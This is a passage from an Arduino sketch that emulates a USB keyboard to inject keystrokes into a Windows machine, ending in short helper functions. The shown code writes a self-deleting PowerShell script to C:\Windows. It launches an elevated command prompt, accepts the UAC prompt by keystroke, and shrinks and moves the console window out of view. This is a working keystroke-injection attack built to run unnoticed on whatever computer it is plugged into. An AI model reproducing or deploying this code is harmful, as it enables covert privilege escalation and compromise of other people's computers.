  824.  
  825. type(KEY_RETURN,false);
  826. Keyboard.releaseAll();
  827.  
  828. print(F("Remove-Item $MyINvocation.InvocationName"));
  829.  
  830. type(KEY_RETURN,false);
  831. Keyboard.releaseAll();
  832.  
  833. type(KEY_LEFT_CTRL,false);
  834. type('S',false);
  835. Keyboard.releaseAll();
  836. delay( 750);
  837.  
  838. print(F("C:\\Windows\\config-6fee6.ps1"));
  839.  
  840. type(KEY_RETURN,false);
  841. Keyboard.releaseAll();
  842. delay(750);
  843.  
  844. type(KEY_LEFT_ALT,false);
  845. type('F',false);
  846. Keyboard.releaseAll();
  847. delay(750);
  848.  
  849. type(KEY_LEFT_GUI,false);
  850. type('r',false);
  851. Keyboard.releaseAll();
  852. delay(750);
  853.  
  854. print(F("powershell Start-Process cmd -Verb runAs"));
  855.  
  856. type(KEY_RETURN,false);
  857. Keyboard.releaseAll();
  858. delay(750);
  859.  
  860. type(KEY_LEFT_ALT,false);
  861. type('y',false);
  862. Keyboard.releaseAll();
  863. delay(750);
  864.  
  865. print(F("mode con:cols=14 lines=1"));
  866.  
  867. type(KEY_RETURN,false);
  868. Keyboard.releaseAll();
  869.  
  870. type(KEY_LEFT_ALT,false);
  871. Keyboard.releaseAll();
  872. delay(750);
  873.  
  874. print(F("m"));
  875. delay(750);
  876.  
  877. type(KEY_DOWN_ARROW,false);
  878. Keyboard.releaseAll();
  879.  
  880. type(KEY_DOWN_ARROW,false);
  881. Keyboard.releaseAll();
  882.  
  883. type(KEY_DOWN_ARROW,false);
  884. Keyboard.releaseAll();
  885.  
  886. type(KEY_DOWN_ARROW,false);
  887. Keyboard.releaseAll();
  888.  
  889. type(KEY_DOWN_ARROW,false);
  890. Keyboard.releaseAll();
  891.  
  892. type(KEY_DOWN_ARROW,false);
  893. Keyboard.releaseAll();
  894.  
  895. type(KEY_DOWN_ARROW,false);
  896. Keyboard.releaseAll();
  897.  
  898. type(KEY_DOWN_ARROW,false);
  899. Keyboard.releaseAll();
  900.  
  901. type(KEY_DOWN_ARROW,false);
  902. Keyboard.releaseAll();
  903.  
  904. type(KEY_DOWN_ARROW,false);
  905. Keyboard.releaseAll();
  906.  
  907. type(KEY_DOWN_ARROW,false);
  908. Keyboard.releaseAll();
  909.  
  910. type(KEY_DOWN_ARROW,false);
  911. Keyboard.releaseAll();
  912.  
  913. type(KEY_DOWN_ARROW,false);
  914. Keyboard.releaseAll();
  915.  
  916. type(KEY_DOWN_ARROW,false);
  917. Keyboard.releaseAll();
  918.  
  919. type(KEY_DOWN_ARROW,false);
  920. Keyboard.releaseAll();
  921.  
  922. type(KEY_DOWN_ARROW,false);
  923. Keyboard.releaseAll();
  924.  
  925. type(KEY_DOWN_ARROW,false);
  926. Keyboard.releaseAll();
  927.  
  928. type(KEY_DOWN_ARROW,false);
  929. Keyboard.releaseAll();
  930.  
  931. type(KEY_DOWN_ARROW,false);
  932. Keyboard.releaseAll();
  933.  
  934. type(KEY_DOWN_ARROW,false);
  935. Keyboard.releaseAll();
  936.  
  937. type(KEY_DOWN_ARROW,false);
  938. Keyboard.releaseAll();
  939.  
  940. type(KEY_DOWN_ARROW,false);
  941. Keyboard.releaseAll();
  942.  
  943. type(KEY_DOWN_ARROW,false);
  944. Keyboard.releaseAll();
  945.  
  946. type(KEY_DOWN_ARROW,false);
  947. Keyboard.releaseAll();
  948.  
  949. type(KEY_DOWN_ARROW,false);
  950. Keyboard.releaseAll();
  951.  
  952. type(KEY_DOWN_ARROW,false);
  953. Keyboard.releaseAll();
  954.  
  955. type(KEY_DOWN_ARROW,false);
  956. Keyboard.releaseAll();
  957.  
  958. type(KEY_DOWN_ARROW,false);
  959. Keyboard.releaseAll();
  960.  
  961. type(KEY_DOWN_ARROW,false);
  962. Keyboard.releaseAll();
  963.  
  964. type(KEY_DOWN_ARROW,false);
  965. Keyboard.releaseAll();
  966.  
  967. type(KEY_DOWN_ARROW,false);
  968. Keyboard.releaseAll();
  969.  
  970. type(KEY_DOWN_ARROW,false);
  971. Keyboard.releaseAll();
  972.  
  973. type(KEY_DOWN_ARROW,false);
  974. Keyboard.releaseAll();
  975.  
  976. type(KEY_DOWN_ARROW,false);
  977. Keyboard.releaseAll();
  978.  
  979. type(KEY_DOWN_ARROW,false);
  980. Keyboard.releaseAll();
  981.  
  982. type(KEY_DOWN_ARROW,false);
  983. Keyboard.releaseAll();
  984.  
  985. type(KEY_DOWN_ARROW,false);
  986. Keyboard.releaseAll();
  987.  
  988. type(KEY_DOWN_ARROW,false);
  989. Keyboard.releaseAll();
  990.  
  991. type(KEY_DOWN_ARROW,false);
  992. Keyboard.releaseAll();
  993.  
  994. type(KEY_DOWN_ARROW,false);
  995. Keyboard.releaseAll();
  996.  
  997. type(KEY_DOWN_ARROW,false);
  998. Keyboard.releaseAll();
  999.  
  1000. type(KEY_DOWN_ARROW,false);
  1001. Keyboard.releaseAll();
  1002.  
  1003. type(KEY_DOWN_ARROW,false);
  1004. Keyboard.releaseAll();
  1005.  
  1006. type(KEY_DOWN_ARROW,false);
  1007. Keyboard.releaseAll();
  1008.  
  1009. type(KEY_DOWN_ARROW,false);
  1010. Keyboard.releaseAll();
  1011.  
  1012. type(KEY_DOWN_ARROW,false);
  1013. Keyboard.releaseAll();
  1014.  
  1015. type(KEY_DOWN_ARROW,false);
  1016. Keyboard.releaseAll();
  1017.  
  1018. type(KEY_DOWN_ARROW,false);
  1019. Keyboard.releaseAll();
  1020. for(int i = 0; i < 70; i++) {
  1021.  
  1022. type(KEY_DOWN_ARROW,false);
  1023. Keyboard.releaseAll();
  1024. }
  1025. Keyboard.end();
  1026. }
/*
 * Press one key on the emulated USB keyboard.
 *
 * key     - key code or character handed to Keyboard.press().
 * release - when true, the same key is released again right away.
 *
 * Every call in setup() passes false, so the key stays held until the
 * following Keyboard.releaseAll(); that is how the sketch forms chords
 * such as GUI+r and ALT+y.
 */
void type(int key, boolean release) {
  Keyboard.press(key);
  if (!release) {
    return;
  }
  Keyboard.release(key);
}
/*
 * Type a string on the emulated USB keyboard.
 *
 * value - string wrapped in F() by the callers and forwarded unchanged
 *         to Keyboard.print().
 */
void print(const __FlashStringHelper *value)
{
  Keyboard.print(value);
}
/*
 * Intentionally empty: all keystrokes are sent from setup(), and nothing
 * in this sketch is repeated from loop().
 */
void loop() {
}